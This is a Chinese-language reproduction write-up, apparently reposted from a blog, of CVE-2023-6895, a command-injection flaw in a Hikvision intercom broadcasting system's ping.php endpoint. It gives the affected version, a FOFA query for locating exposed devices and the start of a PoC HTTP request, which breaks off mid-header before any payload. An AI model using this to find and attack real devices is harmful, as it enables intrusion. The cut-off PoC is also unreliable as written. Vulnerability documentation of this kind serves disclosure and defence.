海康威视对讲广播系统 RCE漏洞复现(CVE-2023-6895)

发布时间:2023年12月20日

0x01 产品简介

Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

0x02 漏洞概述

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

0x03 影响范围

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)

0x04 复现环境

FOFA:icon_hash="-1830859634"

b8af0f9d4ef4403e86e5da9526a47eae.png

0x05 漏洞复现

PoC

POST /php/ping.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Re
文章来源:https://blog.csdn.net/qq_41904294/article/details/135115462
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。